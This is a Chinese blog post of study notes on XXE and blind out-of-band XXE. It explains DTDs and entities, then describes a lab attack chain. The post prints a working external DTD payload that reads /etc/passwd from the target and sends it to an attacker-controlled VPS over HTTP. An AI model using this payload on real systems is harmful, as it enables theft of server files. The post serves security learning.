XXE及Blind_OOB_XXE

最新推荐文章于 2024-12-10 16:47:37 发布
最新推荐文章于 2024-12-10 16:47:37 发布
阅读量2.1k 收藏 4
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39194641/article/details/102251374
版权

前言:

    对于XXE始终是只知其意没实际利用过,再次重新学习一遍XXE。

XML:

    在学习XXE之前要理解XML,关于XML的知识点网上很多,我只介绍关于XXE的相关概念,XXE的时候有三个关键词:

  • XML声明  <?xml version ="1.0" encoding="UTF-8"?>
  • DTD文档定义类型。
  • 文档元素  <foo><note></note></foo> 

DTD文档:

    文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。

    DTD声明元素:

      在 DTD 中,XML 元素通过元素声明来进行声明。元素声明使用下面的语法:

    <!ELEMENT 元素名称 类别>  [类别可为:EMPTY、(#PCDATA)、ANY]

    <!ELEMENT 元素名称 (元素内容)>

    注:其实就是定义元素用的,或者说定义一个对象中的<键>一样。

    DTD声明实体:

    <!ENTITY 实体名称 "实体的值">

    注:其实DTD实体就是变量名 + 值,就是个实例,对象而已。

    DTD文档例子截图:

    内部DTD:

    外部DTD:

    内外结合DTD:

 XML实体:

    XML实体分为(普通实体、外部实体)、(参数实体,外部参数实体),如下图:注(引用的时候有分号;)

    普通实体引入外部实体:

    参数实体引入外部实体:

 XXE的查找方法:

  • Service为Xfire。
  • 明显的XML作为内容的输入点。
  • 某些JSON数据作为请求体的。

*Blind_OOB_XXE :

    如果XXE有回显,那么可以直接利用,如果没有回显,就要用到Blind_OOB_XXE的方式进行利用了,实验环境靶机一台,攻击者VPS一台,攻击机一台:

    首先将提交的用户名密码替换成xml文档,Content_type: text/xml后发现可以正常解析,说明可以发送XML文档同时后台可能有解析XML的代码。Blind_OOB_XXE的攻击路线如下:

    攻击路线说明:首先攻击者发送payload1给靶机,靶机解析payload1,请求VPS的.dtd文件payload2,靶机解析payload2,带着执行结果发送到攻击者VPS,攻击者通过日志查看结果。 

攻击者发送请求如下:

    其中http://192.168.221.129:9090/xxe.dtd的内容为:

<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY xxe SYSTEM 'http://192.168.221.129:55555/pass=%p1;'>">
%p2;

    在VPS上启动http服务,同时监听55555端口:

     VPS中可以看到靶机的"/etc/passwd"文件内容,上述就是Blind_OOB_XXE的攻击链,当然可以使用其他比如FTP的方式请求VPS,都是一样的。

结语:

    写的比较匆忙,内容也不全,仅作记录,后续补充。

Pikachu漏洞平台练习——XXE实体类型举例、Blind OOB XXE、其他协议、XXE漏洞读取文件
7Riven's blog
11-14 1551
1.XXE概述 XXE-“xml external entity injection”,即xml外部实体注入。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 2.本地实体类型与外部的实体类型 本地实体类型举例说明如下: <?xml v...
WEB漏洞——XXE
qq_63594215的博客
04-12 1377
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
xxe主看这个1】学习xxe稍微进阶的知识 ---- OOB xxe盲注,外带
Zero_Adam的博客
04-12 1710
目录:1. 基本知识2.XML的安全性问题当文件内容和 xml 格式相冲突的时候,其他利用 https://www.freebuf.com/video/209186.html 这个是那个pvs的网站,要学习一下curl命令,然后就可以当作一个vps来用了 https://beeceptor.com/console/qwert 1. 基本知识 xml是一种可扩展标记语言,和html类似, 主要区别是 HTML 主要和 数据表示相关。而xml 更多与数据传输和存储有关。 xml可以用在这些地方,等等 我们现在
blind XXE payload
Js_123456789的博客
08-19 605
简单验证 POST /test HTTP/1.1 Content-Type: application/soap+xml User-Agent: scanner Accept: */* Cache-Control: no-cache Host: 域名 Content-Length: 142 Connection: close <?xml version="1.0" encoding...
XXE注入
qq_51360929的博客
11-19 3877
XXE注入 1.什么是XML ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 ​ XML一般用来进行文本的标记,传输,甚至在某些情况下可以建立小型数据库。简单来说,XML负责传输web应用的数据,可以在不兼容的系统中储存数据。 ​ 相比于用HTML中耗费大量时间来编辑动态的数据,XML可以兼容不同的系统,不同的程序都可以通过XML来访问数据。 2.XML的
JAVA XXE 从原理到利用
2401_83799022的博客
05-31 1152
在搜到的文章中有一个令人在意的点,作者提到“由于是java的站,所以利用ftp协议读取文件”,java站和ftp协议有什么关系?简单来说就是将我们原本使用的远程服务器上的dtd变更为了服务器上的本地dtd,去redefine其中的参数实体,再结合报错实现回显。和正常的XXE攻击其实没有太大区别,只是把payload放到了解压后里面的xml中,然后再压缩回到pptx/word/xlsx,上传后在解析过程中就会触发XXE payload。需要关注的是最后一种,参数实体,在实际的XXE攻击中会用到。
java审计之XXE
Hq_Dream的博客
01-20 2207
java审计之XXE 有很久很久没更新这个csdn博客了,忽然想下载个资料发现没积分了,嗯额,分享个最新更新的文章。文章首发是个人的另一个博客 最近审计公司的xxx项目(java方面),对于我也是刚接触java方面的审计,边学习边审计,其中发现了几个有意思的blind xxe于是单独挑出XXE深入研究下,我觉得有必要page记录一下审计与学习的内容,对于xxe方面内容可能还不是太完整后续再添加吧,...
xxe-xml外部实体注入
nigo134的博客
07-27 3152
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
XXE总结
weixin_30819163的博客
01-30 161
0x00 目录 0x01 XML基础 定义:一种标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <?xml version="1.0"?> <!--文档类型定义--> &...
php base64数据读出来后失效_绕过WAF限制利用php:方法实现OOBXXE漏洞利用
weixin_39553458的博客
12-21 327
几个星期以前,作者在某个OOB-XXE漏洞测试中遇到过这样一种场景:目标应用后端系统WAF防火墙阻挡了包含DNS解析在内的所有出站请求(Outgoing Request),但最终,通过利用php://filter//的封装协议,作者成功实现了OOB-XXE漏洞测试。以下是其分享:在对目标应用的测试分析时,我偶然发现了其中一个路径调用了一个名为xml的参数,但其对应的XML数据值是加密的。...
windows文件读取 xxe_通过XXE读取本地文件(HTTP OOB失败后)
weixin_39807352的博客
01-13 309
0x00 前言大家好,今天,我将分享一种非常有趣的利用XXE的技术,该技术是我通过https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/所发现的,且后面经过GoSecure团队研究。该方案是在不允许HTTP带外请求的情况下,仅根据DNS查询记录,通过应用程序抛出XML解析的详细错误消息来读取服务器上的本地文件。0x01 发现过程在用...
XXE学习笔记
qq_63980959的博客
09-26 282
介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXEXXE Injection (XML External Entity Injection,XML 外部实体注入攻击)攻击者可以通过 XML 的外部实体来获取服务器中本应被保护的数据。对于XXE漏洞最为关键的部分是DTD文档类型,DTD 的作用是定义 XML 文档的合法构建模块。
OOB (2)
amao992的专栏
11-02 1985
Out Of Band (OOB) 带外数据 有个不错的英文站介绍了这个OOB,http://alas.matf.bg.ac.rs/manuals/lspe/snode=125.html    带外数据,也叫紧急数据,跟普通数据没有太大区别,就是在接收时,会单独存放在一个独立缓冲中;读取时可以先被读取到(读取方式与普通数据稍有差别)。每次紧急数据只能发送一个字符。
web攻防--xxe实体注入
weixin_74985952的博客
07-29 338
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击,从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施。
【全网最详细】XXE漏洞详解
最新发布
2301_79455190的博客
12-10 2297
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入。XXE漏洞产生在外部实体主要有4个利用方向:文件读取,命令执行,DOS攻击,SSRF按照有无回显可以分为两大类无回显可以加载外部实体,返回数据到我们Vps上;或者加载本地实体报错回显本文转自allv100,如有侵权,请联系删除。给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
XXE知识总结,有这篇就够了!
热门推荐
南迪叶先森
07-14 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! XXE基础 XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XML开始。 XML基础 XML 指可扩展标记语言(EXtensible Markup Lang.
Web安全-XXE漏洞
道阻且长,行则将至
11-25 2765
XML简介 1、定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 2、文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <?xml version="1.0"?> <!--文档类型定义--> <!DOCTYPE no...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值